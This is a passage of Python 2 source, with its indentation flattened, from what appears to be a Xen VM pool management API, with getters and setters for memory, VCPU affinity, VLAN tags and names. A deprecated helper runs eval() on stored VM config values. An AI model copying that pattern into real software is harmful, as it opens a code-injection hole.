@author: wuyuewen
@summary: Get VM is a local VM(disk file in local storage, not shared) or not.
@param session: session of RPC.
@param ref: uuid
@return: True | False.
@rtype: dict.
@raise xen_api_error: key error
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_is_local_vm(session, ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_get_is_local_vm', ref)
else:
return self._VM_get_is_local_vm(session, ref)
def _VM_get_is_local_vm(self, session, ref):
'''
@author: wuyuewen
@summary: Internal method. Get VM is a local VM(disk file in local storage, not shared) or not.
@param session: session of RPC.
@param ref: uuid
@return: True | False.
@rtype: dict.
@raise xen_api_error: key error
'''
# log.debug('ref:%s' % ref)
try:
storage = self._get_BNStorageAPI_instance()
vdis = storage._VDI_get_by_vm(session, ref).get('Value')
if vdis:
for vdi_uuid in vdis:
vdi = storage._get_VDI(vdi_uuid)
if vdi:
sharable = vdi.sharable
if not sharable:
return xen_api_success(not sharable)
else:
log.exception('failed to get vdi by vdi_uuid: %s' % vdi_uuid)
return xen_api_success(True)
# return xen_api_error(['failed to get vdi by vdi_uuid', vdi_uuid])
return xen_api_success(not sharable)
else:
log.exception('failed to get vdi by vm: %s' % ref)
return xen_api_success(False)
# return xen_api_error(['failed to get vdi by vm',ref])
except KeyError:
return xen_api_error(['key error', ref])
except VDIError:
return xen_api_success(False)
# # get inner ip of a VM
# def VM_get_inner_ip(self, session, vm_ref):
# ip_map = self.VM_get_ip_map(session, vm_ref).get('Value')
# mac2ip_list = {}
# for mac, ipmap in ip_map.items():
# inner_ip = ipmap.split('@')[0]
# mac2ip_list[mac] = inner_ip
# return xen_api_success(mac2ip_list)
# #Get mapping intranet ip address to outer net ip address.
# def VM_get_ip_map(self, session, vm_ref):
# if BNPoolAPI._isMaster:
# host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
# if cmp(host_ref, XendNode.instance().uuid) == 0:
# return self._VM_get_ip_map(session, vm_ref)
# else:
# host_ip = BNPoolAPI.get_host_ip(host_ref)
# return xen_rpc_call(host_ip, 'VM_get_ip_map', vm_ref)
# else:
# return self._VM_get_ip_map(session, vm_ref)
#
# def _VM_get_ip_map(self, session, vm_ref):
# dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
# return xen_api_success(dom.get_ip_map())
def VM_get_auto_power_on(self, session, vm_ref):
'''
@deprecated: not used
'''
return self.VM_get('auto_power_on', session, vm_ref)
def VM_get_memory_dynamic_max(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VM's memory dynamic max.
@param session: session of RPC.
@param vm_ref: uuid
@return: memory dynamic max(Bytes).
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_memory_dynamic_max(session, vm_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, 'VM_get_memory_dynamic_max', vm_ref)
else:
return self._VM_get_memory_dynamic_max(session, vm_ref)
def _VM_get_memory_dynamic_max(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Get VM's memory dynamic max.
@param session: session of RPC.
@param vm_ref: uuid
@return: memory dynamic max(Bytes).
@rtype: dict.
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dom.get_memory_dynamic_max())
def VM_get_memory_dynamic_min(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VM's memory dynamic min.
@param session: session of RPC.
@param vm_ref: uuid
@return: memory dynamic min(Bytes).
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_memory_dynamic_min(session, vm_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, 'VM_get_memory_dynamic_min', vm_ref)
else:
return self._VM_get_memory_dynamic_min(session, vm_ref)
def _VM_get_memory_dynamic_min(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Get VM's memory dynamic min.
@param session: session of RPC.
@param vm_ref: uuid
@return: memory dynamic min(Bytes).
@rtype: dict.
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dom.get_memory_dynamic_min())
def VM_get_VCPUs_params(self, session, vm_ref):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dom.get_vcpus_params())
def VM_get_actions_after_shutdown(self, session, vm_ref):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dom.get_on_shutdown())
def VM_get_actions_after_reboot(self, session, vm_ref):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dom.get_on_reboot())
def VM_get_actions_after_suspend(self, session, vm_ref):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dom.get_on_suspend())
def VM_get_actions_after_crash(self, session, vm_ref):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dom.get_on_crash())
def VM_get_PV_bootloader(self, session, vm_ref):
'''
@deprecated: not used
'''
return self.VM_get('PV_bootloader', session, vm_ref)
def VM_get_PV_kernel(self, session, vm_ref):
'''
@deprecated: not used
'''
return self.VM_get('PV_kernel', session, vm_ref)
def VM_get_PV_ramdisk(self, session, vm_ref):
'''
@deprecated: not used
'''
return self.VM_get('PV_ramdisk', session, vm_ref)
def VM_get_PV_args(self, session, vm_ref):
'''
@deprecated: not used
'''
return self.VM_get('PV_args', session, vm_ref)
def VM_get_PV_bootloader_args(self, session, vm_ref):
'''
@deprecated: not used
'''
return self.VM_get('PV_bootloader_args', session, vm_ref)
def VM_get_HVM_boot_policy(self, session, vm_ref):
'''
@deprecated: not used
'''
return self.VM_get('HVM_boot_policy', session, vm_ref)
def VM_get_HVM_boot_params(self, session, vm_ref):
'''
@deprecated: not used
'''
return self.VM_get('HVM_boot_params', session, vm_ref)
def VM_get_platform(self, session, vm_ref):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dom.get_platform())
def VM_get_PCI_bus(self, session, vm_ref):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return dom.get_pci_bus()
def VM_get_VCPUs_affinity(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VM's VCPUs available CPU affinity.
@param session: session of RPC.
@param vm_ref: uuid
@return: dict of CPU affinity.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp (host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_VCPUs_affinity(session, vm_ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_get_VCPUs_affinity', vm_ref)
else:
return self._VM_get_VCPUs_affinity(session, vm_ref)
def _VM_get_VCPUs_affinity(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Get VM's VCPUs available CPU affinity.
@param session: session of RPC.
@param vm_ref: uuid
@return: dict of CPU affinity.
@rtype: dict.
'''
dominfo = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dominfo.getVCPUsAffinity())
def VM_set_VCPUs_affinity(self, session, vm_ref, vcpu, cpumap):
'''
@author: wuyuewen
@summary: Set VM's VCPU available CPU affinity, VCPU can used one of these CPUs.
@precondition: VM not running.
@param session: session of RPC.
@param vm_ref: uuid
@param vcpu: number of VCPU, if VM has 2 VCPU, then VCPU number is 0 or 1.
@param cpumap: numbers of CPUs, e.g. "0,2,4,8" means CPUs number 0,2,4,8
@return: True | False.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp (host_ref, XendNode.instance().uuid) == 0:
return self._VM_set_VCPUs_affinity(session, vm_ref, vcpu, cpumap)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_set_VCPUs_affinity', vm_ref, vcpu, cpumap)
else:
return self._VM_set_VCPUs_affinity(session, vm_ref, vcpu, cpumap)
def _VM_set_VCPUs_affinity(self, session, vm_ref, vcpu, cpumap):
'''
@author: wuyuewen
@summary: Internal method. Set VM's VCPU available CPU affinity, VCPU can used one of these CPUs.
@precondition: VM not running.
@param session: session of RPC.
@param vm_ref: uuid
@param vcpu: number of VCPU, if VM has 2 VCPU, then VCPU number is 0 or 1.
@param cpumap: numbers of CPUs, e.g. "0,2,4,8" means CPUs number 0,2,4,8
@return: True | False.
@rtype: dict.
'''
dominfo = XendDomain.instance().get_vm_by_uuid(vm_ref)
domid = dominfo.getDomid()
if not dominfo:
raise XendInvalidDomain(str(domid))
vcpu = 'cpumap%d' % int(vcpu)
if not domid or cmp(domid, -1) == 0 :
self.VM_add_to_VCPUs_params(session, vm_ref, vcpu, cpumap)
else:
self.VM_add_to_VCPUs_params_live(session, vm_ref, vcpu, cpumap)
# dominfo.setVCPUsAffinity(vcpu, cpumap)
return xen_api_success_void()
def VM_set_PCI_bus(self, session, vm_ref, val):
'''
@deprecated: not used
'''
return self.VM_set('PCI_bus', session, vm_ref, val)
def VM_get_other_config(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VM's other config.
@param session: session of RPC.
@param vm_ref: uuid
@return: other config field.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_other_config(session, vm_ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_get_other_config', vm_ref)
else:
return self._VM_get_other_config(session, vm_ref)
#
# host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
# if cmp(host_ref, XendNode.instance().uuid) == 0:
# return self.VM_get('other_config', session, vm_ref)
# else:
# log.debug("get other config")
# host_ip = BNPoolAPI._host_structs[host_ref]['ip']
# return xen_rpc_call(host_ip, "VM_get_other_config", vm_ref)
# add by wufan 20131016
def _VM_get_other_config(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Get VM's other config.
@param session: session of RPC.
@param vm_ref: uuid
@return: other config field.
@rtype: dict.
'''
other_config = self.VM_get('other_config', session, vm_ref).get('Value')
#log.debug('_VM_get_other_config: type%s value%s' % (type(other_config), other_config))
#if other_config :
# tag_list = other_config.get('tag',{})
# if isinstance(tag_list, str):
# self._VM_convert_other_config(session, vm_ref)
# other_config = self.VM_get('other_config', session, vm_ref).get('Value')
return xen_api_success(other_config)
# add by wufan
def _VM_convert_other_config(self, session, vm_ref):
'''
@deprecated: not used
'''
OTHER_CFG_DICT_kEYS = ['tag', 'rate', 'burst']
convert_other_config = {}
other_config = self.VM_get('other_config', session, vm_ref).get('Value')
#log.debug('_VM_get_other_config: type%s value%s' % (type(other_config), other_config))
if other_config and isinstance(other_config, dict):
for key, value in other_config.items():
if key in OTHER_CFG_DICT_kEYS and not isinstance(value, dict):
value = eval(value)
if isinstance(value, dict):
convert_other_config.setdefault(key,{})
for k, v in value.items():
convert_other_config[key][k] = v
else:
convert_other_config[key] = value
self._VM_set_other_config(session, vm_ref, convert_other_config)
log.debug('_VM_convert_other_config: type%s value%s' % (type(convert_other_config), convert_other_config))
return xen_api_success_void()
def VM_get_tags(self, session, vm_ref):
'''
@deprecated: not used
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_tags(session, vm_ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_get_tags', vm_ref)
else:
return self._VM_get_tags(session, vm_ref)
def _VM_get_tags(self, session, vm_ref):
'''
@deprecated: not used
'''
try:
return self.VM_get('tags', session, vm_ref)
except Exception, exn:
log.exception(exn)
return xen_api_error(exn)
def VM_get_all_tag(self, session, vm_ref, tag_type):
'''
@deprecated: not used
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_all_tag(session, vm_ref, tag_type)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_get_all_tag', vm_ref, tag_type)
else:
return self._VM_get_all_tag(session, vm_ref, tag_type)
def _VM_get_all_tag(self, session, vm_ref, tag_type):
'''
@deprecated: not used
'''
tag_list = {}
try:
other_config = self._VM_get_other_config(session, vm_ref).get('Value')
#log.debug('other_config: %s', other_config)
if other_config:
tag_list = other_config.get(tag_type,{})
log.debug('list:%s' % tag_list)
return xen_api_success(tag_list)
except Exception, exn:
log.exception(exn)
return xen_api_success(tag_list)
def VM_get_tag(self, session, vm_ref, vif_ref):
'''
@author: wuyuewen
@summary: Get VIF's tag(VLAN-ID), this attribute stored in VM's other_config field.
@param session: session of RPC.
@param vm_ref: uuid
@param vif_ref: VIF uuid
@return: VIF's tag number(VLAN-ID), default number is -1(VLAN not used).
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_tag(session, vm_ref, vif_ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_get_tag', vm_ref, vif_ref)
else:
return self._VM_get_tag(session, vm_ref, vif_ref)
# original:wuyuewen
#def _VM_get_tag(self, session, vm_ref):
# try:
# other_config = self._VM_get_other_config(session, vm_ref).get('Value')
# tag = "-1"
# if other_config:
# tag = other_config.get('tag', "-1")
# return xen_api_success(tag)
# except Exception, exn:
# log.exception(exn)
# return xen_api_success(tag)
# add by wufan read from VM's other_config
def _VM_get_tag(self, session, vm_ref, vif_ref):
'''
@author: wuyuewen
@summary: Internal method. Get VIF's tag(VLAN-ID), this attribute stored in VM's other_config field.
@param session: session of RPC.
@param vm_ref: uuid
@param vif_ref: VIF uuid
@return: VIF's tag number(VLAN-ID), default number is -1(VLAN not used).
@rtype: dict.
'''
tag = '-1'
eth_num = '-1'
try:
other_config = self._VM_get_other_config(session, vm_ref).get('Value')
device = self.VIF_get_device(session, vif_ref).get('Value')
if device != '' and device.startswith('eth'):
eth_num = device[3:]
if other_config:
tag_list = other_config.get('tag',{})
#log.debug('tag_list type:%s' % type(tag_list))
tag = tag_list.get(eth_num,'-1')
#log.debug('_VM_get_tag:%s' % tag)
return xen_api_success(tag)
except Exception, exn:
log.exception(exn)
return xen_api_success(tag)
def VM_get_rate(self, session, vm_ref, param_type, vif_ref):
'''
@author: wuyuewen
@summary: Get VIF's rate and burst limit controlled by OVS,
this attribute stored in VM's other_config field.
@param session: session of RPC.
@param vm_ref: uuid
@param param_type: rate/burst, rate is the rate(kbps) of VIF port controlled by OVS,
burst(kbps) is the volatility overhead rate.
@param vif_ref: VIF uuid
@return: VIF's rate(kbps).
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_rate(session, vm_ref, param_type, vif_ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_get_rate', vm_ref, param_type, vif_ref)
else:
return self._VM_get_rate(session, vm_ref, param_type, vif_ref)
def _VM_get_rate(self, session, vm_ref, param_type, vif_ref):
'''
@author: wuyuewen
@summary: Internal method. Get VIF's rate and burst limit controlled by OVS,
this attribute stored in VM's other_config field.
@param session: session of RPC.
@param vm_ref: uuid
@param param_type: rate/burst, rate is the rate(kbps) of VIF port controlled by OVS,
burst(kbps) is the volatility overhead rate.
@param vif_ref: VIF uuid
@return: VIF's rate(kbps).
@rtype: dict.
'''
rate = '-1'
eth_num = '-1'
try:
other_config = self._VM_get_other_config(session, vm_ref).get('Value')
device = self.VIF_get_device(session, vif_ref).get('Value')
#log.debug('>>>>>>>>>>>>device')
#log.debug(device)
eth_num = ''
if device != '' and device.startswith('eth'):
eth_num = device[3:]
elif not device :
vif_refs = self._VM_get_VIFs(session, vm_ref).get('Value')
log.debug('vif_refs %s' % vif_refs)
try:
eth_num = str(vif_refs.index(vif_ref))
except:
eth_num = ''
pass
log.debug('eth_num %s' % eth_num)
if other_config and eth_num != '':
rate_list = other_config.get(param_type,{})
log.debug('rate_list %s' % rate_list)
rate = rate_list.get(eth_num,'-1')
return xen_api_success(rate)
except Exception, exn:
log.exception(exn)
return xen_api_success(rate)
def VM_get_domid(self, _, ref):
'''
@author: wuyuewen
@summary: Get VM's id.
@precondition: VM is running.
@param _: session of RPC.
@param ref: uuid
@return: VM's id.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_domid(_, ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_get_domid', ref)
else:
return self._VM_get_domid(_, ref)
def _VM_get_domid(self, _, ref):
'''
@author: wuyuewen
@summary: Internal method. Get VM's id.
@precondition: VM is running.
@param _: session of RPC.
@param ref: uuid
@return: VM's id.
@rtype: dict.
'''
domid = XendDomain.instance().get_vm_by_uuid(ref).getDomid()
return xen_api_success(domid is None and -1 or domid)
def VM_get_cpu_pool(self, session, vm_ref):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
pool_ref = XendCPUPool.query_pool_ref(dom.get_cpu_pool())
return xen_api_success(pool_ref)
def VM_set_pool_name(self, session, vm_ref, value):
'''
@deprecated: not used
'''
return self.VM_set('pool_name', session, vm_ref, value)
def VM_get_is_control_domain(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Check the VM is dom0 or not.
@param session: session of RPC.
@param vm_ref: uuid
@return: True | False.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_is_control_domain(session, vm_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, "VM_get_is_control_domain", vm_ref)
else:
return self._VM_get_is_control_domain(session, vm_ref)
def _VM_get_is_control_domain(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Check the VM is dom0 or not.
@param session: session of RPC.
@param vm_ref: uuid
@return: True | False.
@rtype: dict.
'''
xd = XendDomain.instance()
return xen_api_success(xd.get_vm_by_uuid(vm_ref) == xd.privilegedDomain())
def VM_get_VIF_record(self, session, vm_ref, vif_ref):
'''
@author: wuyuewen
@summary: Get VIF record, this method is a instead of VIF_get_record() use in Pool.
@param session: session of RPC.
@param vm_ref: uuid
@param vif_ref: VIF uuid
@return: VIF record struct.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self.VIF_get_record(session, vif_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, "VIF_get_record", vif_ref)
else:
return self.VIF_get_record(session, vif_ref)
def VM_get_network_record(self, session, vm_ref, vif):
'''
@author: wuyuewen
@summary: Get network record, this method is a instead of network_get_record() use in Pool.
@param session: session of RPC.
@param vm_ref: uuid
@param vif: VIF uuid
@return: network record struct.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
xenapi = self._get_XendAPI_instance()
bridge = self._VIF_get(vif, "bridge").get('Value')
list_network = xenapi.network_get_by_name_label(session, bridge).get('Value')
if not list_network:
return xen_api_error(['NETWORK_NOT_EXISTS'])
net_ref = list_network[0]
net = XendAPIStore.get(net_ref, "network")
return xen_api_success(net.get_record())
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, "VM_get_network_record", vm_ref, vif)
else:
xenapi = self._get_XendAPI_instance()
bridge = self._VIF_get(vif, "bridge").get('Value')
list_network = xenapi.network_get_by_name_label(session, bridge).get('Value')
if not list_network:
return xen_api_error(['NETWORK_NOT_EXISTS'])
net_ref = list_network[0]
net = XendAPIStore.get(net_ref, "network")
return xen_api_success(net.get_record())
def VM_get_VBD_record(self, session, vm_ref, vbd_ref):
'''
@author: wuyuewen
@summary: Get VBD record, this method is a instead of VBD_get_record() use in Pool.
@param session: session of RPC.
@param vm_ref: uuid
@param vbd_ref: VBD uuid
@return: VBD record struct.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self.VBD_get_record(session, vbd_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, "VBD_get_record", vbd_ref)
else:
return self.VBD_get_record(session, vbd_ref)
def VM_get_system_VDI(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VDI that VM's system VBD linked, VM->VBD(VM's disk)->VDI(Storage management).
@precondition: VM has system VBD device.
@param session: session of RPC.
@param vm_ref: uuid
@return: VDI.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_system_VDI(session, vm_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, "VM_get_system_VDI", vm_ref)
else:
return self._VM_get_system_VDI(session, vm_ref)
def _VM_get_system_VDI(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Get VDI that VM's system VBD linked, VM->VBD(VM's disk)->VDI(Storage management).
@precondition: VM has system VBD device.
@param session: session of RPC.
@param vm_ref: uuid
@return: VDI.
@rtype: dict.
'''
vbds = self._VM_get_VBDs(session, vm_ref).get('Value', [])
sys_vbd = ''
sys_vdi = ''
if vbds:
for vbd in vbds:
bootable = self.VBD_get_bootable(session, vbd).get('Value', False)
vbd_type = self.VBD_get_type(session, vbd).get('Value', '')
if bootable and cmp(vbd_type, 'Disk') == 0:
sys_vbd = vbd
break
if sys_vbd:
sys_vdi = self.VBD_get_VDI(session, sys_vbd).get('Value', '')
return xen_api_success(sys_vdi)
def VM_set_name_label(self, session, vm_ref, label):
'''
@author: wuyuewen
@summary: Set VM's name label.
@precondition: Only support english, param <label> has no special character except "_" "-" ".".
@param session: session of RPC.
@param vm_ref: uuid
@param label: name label to change.
@return: True | False
@rtype: dict.
@raise xen_api_error: VM error
'''
try:
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
self._VM_set_name_label(session, vm_ref, label)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
xen_rpc_call(remote_ip, 'VM_set_name_label', vm_ref, label)
return xen_api_success_void()
else:
return self._VM_set_name_label(session, vm_ref, label)
except VmError, e:
return xen_api_error(['VM error: ', e])
def _VM_set_name_label(self, session, vm_ref, label):
'''
@author: wuyuewen
@summary: Internal method. Set VM's name label.
@precondition: Only support english, param <label> has no special character except "_" "-" ".".
@param session: session of RPC.
@param vm_ref: uuid
@param label: name label to change.
@return: True | False
@rtype: dict.
@raise xen_api_error: VM error
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
dom.setName(label)
self._VM_save(dom)
return xen_api_success_void()
def VM_set_name_description(self, session, vm_ref, desc):
'''
@author: wuyuewen
@summary: Set VM's name description.
@precondition: Only support english, param <desc> has no special character except "_" "-" ".".
@param session: session of RPC.
@param vm_ref: uuid
@param desc: name description to change.
@return: True | False
@rtype: dict.
@raise xen_api_error: VM error
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_set_name_description(session, vm_ref, desc)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_set_name_description', vm_ref, desc)
else:
return self._VM_set_name_description(session, vm_ref, desc)
def _VM_set_name_description(self, session, vm_ref, desc):
'''
@author: wuyuewen
@summary: Internal method. Set VM's name description.
@precondition: Only support english, param <desc> has no special character except "_" "-" ".".
@param session: session of RPC.
@param vm_ref: uuid
@param desc: name description to change.
@return: True | False
@rtype: dict.
@raise xen_api_error: VM error
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
dom.setNameDescription(desc)
self._VM_save(dom)
return xen_api_success_void()
def VM_set_user_version(self, session, vm_ref, ver):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_todo()
def VM_set_is_a_template(self, session, vm_ref, is_template):
'''
@author: wuyuewen
@summary: Change a VM to VM template, or change a VM template to VM.
@precondition: VM not running.
@param session: session of RPC.
@param vm_ref: uuid
@param is_template: True | False
@return: True | False
@rtype: dict.
@raise xen_api_error: VM_BAD_POWER_STATE
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
host_ip = BNPoolAPI.get_host_ip(host_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_set_is_a_template(session, vm_ref, is_template)
else:
return xen_rpc_call(host_ip, 'VM_set_is_a_template', vm_ref, is_template)
else:
return self._VM_set_is_a_template(session, vm_ref, is_template)
def _VM_set_is_a_template(self, session, vm_ref, is_template):
'''
@author: wuyuewen
@summary: Internal method. Change a VM to VM template, or change a VM template to VM.
@precondition: VM not running.
@param session: session of RPC.
@param vm_ref: uuid
@param is_template: True | False
@return: True | False
@rtype: dict.
@raise xen_api_error: VM_BAD_POWER_STATE
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
if dom._stateGet() == XEN_API_VM_POWER_STATE_RUNNING:
return xen_api_error(
['VM_BAD_POWER_STATE', vm_ref,
XendDomain.POWER_STATE_NAMES[XEN_API_VM_POWER_STATE_RUNNING],
XendDomain.POWER_STATE_NAMES[dom._stateGet()]])
dom.set_is_a_template(is_template)
self.VM_save(dom)
return xen_api_success_void()
# #Mapping intranet ip address to outer net ip address.
# def VM_set_ip_map(self, session, vm_ref, vif):
# if BNPoolAPI._isMaster:
# host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
# if cmp(host_ref, XendNode.instance().uuid) == 0:
# return self._VM_set_ip_map(session, vm_ref, vif)
# else:
# host_ip = BNPoolAPI.get_host_ip(host_ref)
# return xen_rpc_call(host_ip, 'VM_set_ip_map', vm_ref, vif)
# else:
# return self._VM_set_ip_map(session, vm_ref, vif)
#
# def _VM_set_ip_map(self, session, vm_ref, vif):
# mac = None
# mac_rec = self.VIF_get_MAC(session, vif)
# if mac_rec.get('Status') == 'Success':
# mac = mac_rec.get('Value')
# if mac:
# dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
# dom.set_ip_map(mac)
# return xen_api_success(self._VM_save(dom))
# else:
# log.error('Can not get MAC from vif.')
# return xen_api_error(['Get MAC from vif failed!VM:', vm_ref])
# def VM_del_ip_map(self, session, vm_ref, vif):
# if BNPoolAPI._isMaster:
# host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
# if cmp(host_ref, XendNode.instance().uuid) == 0:
# return self._VM_del_ip_map(session, vm_ref, vif)
# else:
# host_ip = BNPoolAPI.get_host_ip(host_ref)
# return xen_rpc_call(host_ip, 'VM_del_ip_map', vm_ref, vif)
# else:
# return self._VM_del_ip_map(session, vm_ref, vif)
#
# def _VM_del_ip_map(self, session, vm_ref, vif):
# mac = None
# mac_rec = self.VIF_get_MAC(session, vif)
# if mac_rec.get('Status') == 'Success':
# mac = mac_rec.get('Value')
# if mac:
# dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
# dom.set_ip_map(mac, True)
# return xen_api_success(self._VM_save(dom))
# else:
# log.error('Can not get MAC from vif.')
# return xen_api_error(['Get MAC from vif failed!VM:', vm_ref])
def VM_set_auto_power_on(self, session, vm_ref, val):
'''
@deprecated: not used
'''
return self.VM_set('auto_power_on', session, vm_ref, val)
def VM_set_memory_dynamic_max(self, session, vm_ref, mem):
'''
@author: wuyuewen
@summary: Set VM's memory dynamic max.
@precondition: VM not running, memory dynamic max > 0, memory dynamic max <= memory static max.
@param session: session of RPC.
@param vm_ref: uuid
@param mem: memory(Bytes)
@return: True | False.
@rtype: dict.
@raise XendConfigError:
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_set_memory_dynamic_max(session, vm_ref, mem)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, 'VM_set_memory_dynamic_max', vm_ref, mem)
else:
return self._VM_set_memory_dynamic_max(session, vm_ref, mem)
def _VM_set_memory_dynamic_max(self, session, vm_ref, mem):
'''
@author: wuyuewen
@summary: Internal method. Set VM's memory dynamic max.
@precondition: VM not running, memory dynamic max > 0, memory dynamic max <= memory static max.
@param session: session of RPC.
@param vm_ref: uuid
@param mem: memory(Bytes)
@return: True | False.
@rtype: dict.
@raise XendConfigError:
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
dom.set_memory_dynamic_max(int(mem))
